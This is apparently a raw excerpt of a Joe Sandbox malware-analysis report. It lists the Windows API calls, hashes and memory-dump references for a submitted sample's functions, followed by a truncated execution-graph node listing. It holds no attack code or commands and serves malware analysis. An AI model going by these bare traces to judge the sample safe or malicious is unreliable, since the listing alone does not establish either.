                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseHandleModuleProc
                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                              • API String ID: 4190037839-2401316094
                                                                              • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                              • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                              • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                              • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                              • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                              • String ID:
                                                                              • API String ID: 1694776339-0
                                                                              • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                              • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                              • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                              • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultSystem
                                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 1044490935-665933166
                                                                              • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                              • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                              • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                              • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                              • LocalFree.KERNEL32(0061FC50,00000000,00401AB4), ref: 00401A1B
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,0061FC50,00000000,00401AB4), ref: 00401A3A
                                                                              • LocalFree.KERNEL32(0061ED00,?,00000000,00008000,0061FC50,00000000,00401AB4), ref: 00401A79
                                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                              • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                              • String ID:
                                                                              • API String ID: 3782394904-0
                                                                              • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                              • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                              • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                              • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                              • ExitProcess.KERNEL32 ref: 00403DE5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ExitMessageProcess
                                                                              • String ID: Error$Runtime error at 00000000$9@
                                                                              • API String ID: 1220098344-1503883590
                                                                              • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                              • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                              • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                              • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 262959230-0
                                                                              • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                              • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                              • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                              • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                              • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CommandHandleLineModule
                                                                              • String ID: U1hd.@$%`
                                                                              • API String ID: 2123368496-935274462
                                                                              • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                              • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                              • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                              • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                              APIs
                                                                              • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                              • String ID:
                                                                              • API String ID: 730355536-0
                                                                              • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                              • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                              • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                              • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID: )q@
                                                                              • API String ID: 3660427363-2284170586
                                                                              • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                              • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                              • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                              • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                              APIs
                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastSleep
                                                                              • String ID:
                                                                              • API String ID: 1458359878-0
                                                                              • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                              • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                              • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                              • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                              Execution Graph

                                                                              Execution Coverage: 14.4%
                                                                              Dynamic/Decrypted Code Coverage: 0.4%
                                                                              Signature Coverage: 4.5%
                                                                              Total number of Nodes: 2000
                                                                              Total number of Limit Nodes: 91
53572->53573 53577 46a2a2 53573->53577 53578 46a246 53574->53578 53579 46a278 53575->53579 53576->53564 53580 414b28 4 API calls 53577->53580 54612 469f30 53578->54612 53581 414b28 4 API calls 53579->53581 53580->53578 53581->53578 53585 4683b4 19 API calls 53587 46a340 53585->53587 53586 46a2e0 53586->53585 53588 46a3a3 53587->53588 54618 49314c 18 API calls 53587->54618 53588->53415 53591 46b4a8 47 API calls 53590->53591 53592 4814af 53591->53592 53593 4814b8 53592->53593 54818 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53592->54818 53595 414af8 4 API calls 53593->53595 53596 4814c8 53595->53596 53597 403450 4 API calls 53596->53597 53598 4814d5 53597->53598 54638 46b7b8 53598->54638 53601 4814e5 53603 414af8 4 API calls 53601->53603 53604 4814f5 53603->53604 53605 403450 4 API calls 53604->53605 53606 481502 53605->53606 53607 468fa8 SendMessageA 53606->53607 53608 48151b 53607->53608 53609 481559 53608->53609 54820 478a14 23 API calls 53608->54820 53611 4241ec 11 API calls 53609->53611 53612 481563 53611->53612 53613 481589 53612->53613 53614 481574 SetActiveWindow 53612->53614 54667 480a68 53613->54667 53614->53613 53661->53388 53662->53388 53663->53388 56538 43d21c 53664->56538 53667 49322c 56543 431424 53667->56543 53668 4932b2 53669 4932c1 53668->53669 56576 492a28 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53668->56576 53669->53415 53678 493276 56574 492abc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53678->56574 53680 49328a 56575 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53680->56575 53682 4932aa 53682->53415 53683->53410 53685 457139 53684->53685 53686 457159 53685->53686 53687 4078fc 19 API calls 53685->53687 53689 403400 4 API calls 53686->53689 53688 457151 53687->53688 53690 456f08 24 API calls 53688->53690 53691 45716e 53689->53691 53690->53686 53691->53425 53692->53415 53694 414b06 53693->53694 53695 4034e0 4 API calls 53694->53695 53696 414b13 53695->53696 53696->53429 53698 46a6b6 53697->53698 53699 
46c465 53697->53699 53698->53440 53707 46c53c 53699->53707 53702 414af8 4 API calls 53701->53702 53703 414b4c 53702->53703 53704 403400 4 API calls 53703->53704 53705 414b7d 53704->53705 53705->53445 53706->53441 53708 46c543 53707->53708 53711 45cf00 53708->53711 53712 45cf0b 53711->53712 53713 45cf26 VirtualAlloc 53712->53713 53714 45cf45 53713->53714 53715 45cf4a BZ2_bzDecompressInit 53713->53715 53714->53715 53718 45ce5c 19 API calls 53715->53718 53717 45cf8f 53717->53698 53718->53717 53740 46b534 53719->53740 53722->53465 53724 465d2e 53723->53724 53909 4078fc 53724->53909 53728 450aa8 53727->53728 53928 450960 53728->53928 53952 42cc98 53732->53952 53735 450ab8 53736 450a88 4 API calls 53735->53736 53737 450ad4 53736->53737 53738 47d508 42 API calls 53737->53738 53738->53461 53739->53454 53741 414af8 4 API calls 53740->53741 53742 46b566 53741->53742 53794 465fac 53742->53794 53745 414b28 4 API calls 53746 46b578 53745->53746 53747 46b587 53746->53747 53749 46b5a0 53746->53749 53843 47d508 42 API calls 53747->53843 53751 46b5e7 53749->53751 53753 46b5ce 53749->53753 53750 403420 4 API calls 53752 46a90a 53750->53752 53754 46b64c 53751->53754 53767 46b5eb 53751->53767 53752->53449 53752->53450 53844 47d508 42 API calls 53753->53844 53846 42cb18 CharNextA 53754->53846 53757 46b65b 53758 46b65f 53757->53758 53761 46b678 53757->53761 53847 47d508 42 API calls 53758->53847 53760 46b633 53845 47d508 42 API calls 53760->53845 53762 46b69c 53761->53762 53803 46611c 53761->53803 53848 47d508 42 API calls 53762->53848 53767->53760 53767->53761 53770 46b6b5 53771 403778 4 API calls 53770->53771 53772 46b6cb 53771->53772 53811 42c968 53772->53811 53775 46b6dc 53849 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53775->53849 53776 46b70a 53778 42c898 5 API calls 53776->53778 53780 46b715 53778->53780 53779 46b6ef 53781 450ab8 4 API calls 53779->53781 53815 42c40c 53780->53815 53784 46b6fc 53781->53784 53783 46b720 53825 42cb8c 53783->53825 53850 47d508 42 API calls 
53784->53850 53792 46b59b 53792->53750 53798 465fc6 53794->53798 53795 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53795->53798 53797 42cb8c 6 API calls 53797->53798 53798->53795 53798->53797 53799 403450 4 API calls 53798->53799 53800 46600f 53798->53800 53852 42ca78 53798->53852 53799->53798 53801 403420 4 API calls 53800->53801 53802 466029 53801->53802 53802->53745 53804 466126 53803->53804 53805 466139 53804->53805 53882 42cb08 CharNextA 53804->53882 53805->53762 53807 46614c 53805->53807 53809 466156 53807->53809 53808 466183 53808->53762 53808->53770 53809->53808 53883 42cb08 CharNextA 53809->53883 53812 42c9c1 53811->53812 53813 42c97e 53811->53813 53812->53775 53812->53776 53813->53812 53884 42cb08 CharNextA 53813->53884 53816 42c416 53815->53816 53817 42c439 53815->53817 53885 42c948 CharPrevA 53816->53885 53819 403494 4 API calls 53817->53819 53820 42c442 53819->53820 53820->53783 53821 42c41d 53821->53817 53822 42c428 53821->53822 53886 4035c0 53822->53886 53824 42c436 53824->53783 53826 42c648 IsDBCSLeadByte 53825->53826 53829 42cb9d 53826->53829 53827 42cbc4 53830 42cbda 53827->53830 53831 42cbcf 53827->53831 53829->53827 53908 42cb10 CharPrevA 53829->53908 53843->53792 53844->53792 53845->53792 53846->53757 53847->53792 53848->53792 53849->53779 53850->53792 53853 403494 4 API calls 53852->53853 53854 42ca88 53853->53854 53859 42cabe 53854->53859 53861 403744 53854->53861 53865 42c454 IsDBCSLeadByte 53854->53865 53857 42cb02 53857->53798 53859->53857 53866 4037b8 53859->53866 53871 42c454 IsDBCSLeadByte 53859->53871 53862 40374a 53861->53862 53864 40375b 53861->53864 53863 4034bc 4 API calls 53862->53863 53862->53864 53863->53864 53864->53854 53865->53854 53867 403744 4 API calls 53866->53867 53869 4037c6 53867->53869 53868 4037fc 53868->53859 53869->53868 53872 4038a4 53869->53872 53871->53859 53873 4038b1 53872->53873 53880 4038e1 53872->53880 53875 4038da 53873->53875 53876 4038bd 53873->53876 53874 403400 4 API calls 53878 4038cb 
53874->53878 53877 4034bc 4 API calls 53875->53877 53881 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53876->53881 53877->53880 53878->53868 53880->53874 53881->53878 53882->53804 53883->53809 53884->53813 53885->53821 53887 4035c4 53886->53887 53891 40357c 53886->53891 53888 4035e2 53887->53888 53889 4035d4 53887->53889 53887->53891 53892 403450 53887->53892 53894 4034bc 4 API calls 53888->53894 53893 403450 4 API calls 53889->53893 53890 403490 53890->53824 53891->53892 53896 4035bf 53891->53896 53897 40358a 53891->53897 53895 4034bc 4 API calls 53892->53895 53898 403464 53892->53898 53893->53891 53904 4035f5 53894->53904 53895->53898 53896->53824 53899 4035b4 53897->53899 53900 40359d 53897->53900 53898->53890 53901 402660 4 API calls 53898->53901 53901->53890 53908->53829 53912 407910 53909->53912 53913 40792d 53912->53913 53920 4075c0 53913->53920 53916 407959 53918 4034e0 4 API calls 53916->53918 53919 40790b 53918->53919 53919->53472 53922 4075db 53920->53922 53921 4075ed 53921->53916 53925 4069a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53921->53925 53922->53921 53926 4076e2 19 API calls 53922->53926 53927 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53922->53927 53925->53916 53926->53922 53927->53922 53929 403400 4 API calls 53928->53929 53936 450991 53929->53936 53953 42cb8c 6 API calls 53952->53953 53954 42ccba 53953->53954 53955 42ccc2 GetFileAttributesA 53954->53955 53956 403400 4 API calls 53955->53956 53957 42ccdf 53956->53957 53957->53461 53957->53735 53958->53489 53961 4699bb 53959->53961 53960 469e33 53962 469e4e 53960->53962 53963 469e7f 53960->53963 53961->53960 53964 469a76 53961->53964 53967 403494 4 API calls 53961->53967 53966 403494 4 API calls 53962->53966 53968 403494 4 API calls 53963->53968 53965 469a97 53964->53965 53969 469ad8 53964->53969 53970 403494 4 API calls 53965->53970 53971 469e5c 53966->53971 53972 4699fa 53967->53972 53973 469e8d 53968->53973 53977 403400 4 API calls 53969->53977 53974 
469aa5 53970->53974 54065 46889c 12 API calls 53971->54065 53976 414af8 4 API calls 53972->53976 54066 46889c 12 API calls 53973->54066 53979 414af8 4 API calls 53974->53979 53981 469a1b 53976->53981 53982 469ad6 53977->53982 53984 469ac6 53979->53984 53980 469e6a 53983 403400 4 API calls 53980->53983 53985 403634 4 API calls 53981->53985 54002 469bbc 53982->54002 54045 468fa8 53982->54045 53987 469eb0 53983->53987 53989 403634 4 API calls 53984->53989 53990 469a2b 53985->53990 53993 403400 4 API calls 53987->53993 53988 469c44 53991 403400 4 API calls 53988->53991 53989->53982 53994 414af8 4 API calls 53990->53994 53995 469c42 53991->53995 53992 469af8 53996 469b36 53992->53996 53997 469afe 53992->53997 53998 469eb8 53993->53998 53999 469a3f 53994->53999 54060 4693e4 43 API calls 53995->54060 54003 403400 4 API calls 53996->54003 54000 403494 4 API calls 53997->54000 54001 403420 4 API calls 53998->54001 53999->53964 54008 414af8 4 API calls 53999->54008 54004 469b0c 54000->54004 54005 469ec5 54001->54005 54002->53988 54006 469c03 54002->54006 54007 469b34 54003->54007 54051 47ad88 54004->54051 54005->53495 54012 403494 4 API calls 54006->54012 54054 46929c 54007->54054 54009 469a66 54008->54009 54013 403634 4 API calls 54009->54013 54016 469c11 54012->54016 54013->53964 54014 469c6d 54022 469cce 54014->54022 54023 469c78 54014->54023 54015 469b24 54017 403634 4 API calls 54015->54017 54018 414af8 4 API calls 54016->54018 54017->54007 54020 469c32 54018->54020 54024 403634 4 API calls 54020->54024 54021 469b5d 54027 469bbe 54021->54027 54028 469b68 54021->54028 54025 403400 4 API calls 54022->54025 54026 403494 4 API calls 54023->54026 54024->53995 54029 469cd6 54025->54029 54034 469c86 54026->54034 54031 403400 4 API calls 54027->54031 54030 403494 4 API calls 54028->54030 54032 469ccc 54029->54032 54043 469d7f 54029->54043 54036 469b76 54030->54036 54031->54002 54032->54029 54061 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54032->54061 54034->54029 
54034->54032 54037 403634 4 API calls 54034->54037 54035 469cf9 54035->54043 54062 49339c 18 API calls 54035->54062 54036->54002 54039 403634 4 API calls 54036->54039 54037->54034 54039->54036 54041 469e20 54064 429154 SendMessageA SendMessageA 54041->54064 54063 429104 SendMessageA 54043->54063 54044->53497 54067 42a050 SendMessageA 54045->54067 54047 468fb7 54048 468fd7 54047->54048 54068 42a050 SendMessageA 54047->54068 54048->53992 54050 468fc7 54050->53992 54069 47ada8 54051->54069 54058 4692c9 54054->54058 54055 46932b 54056 403400 4 API calls 54055->54056 54057 469340 54056->54057 54057->54021 54058->54055 54393 469220 43 API calls 54058->54393 54060->54014 54061->54035 54062->54043 54063->54041 54064->53960 54065->53980 54066->53980 54067->54047 54068->54050 54070 403494 4 API calls 54069->54070 54078 47addb 54070->54078 54071 47aee0 54072 403420 4 API calls 54071->54072 54073 47ada3 54072->54073 54073->54015 54074 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54074->54078 54076 403778 4 API calls 54076->54078 54078->54071 54078->54074 54078->54076 54081 479cfc 54078->54081 54313 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54078->54313 54314 403800 54078->54314 54318 42c948 CharPrevA 54078->54318 54082 479d4e 54081->54082 54085 479d2c 54081->54085 54083 479d6e 54082->54083 54084 479d5c 54082->54084 54088 479dd1 54083->54088 54089 479d7c 54083->54089 54086 403494 4 API calls 54084->54086 54085->54082 54323 478c2c 19 API calls 54085->54323 54210 479d69 54086->54210 54100 479df2 54088->54100 54101 479ddf 54088->54101 54091 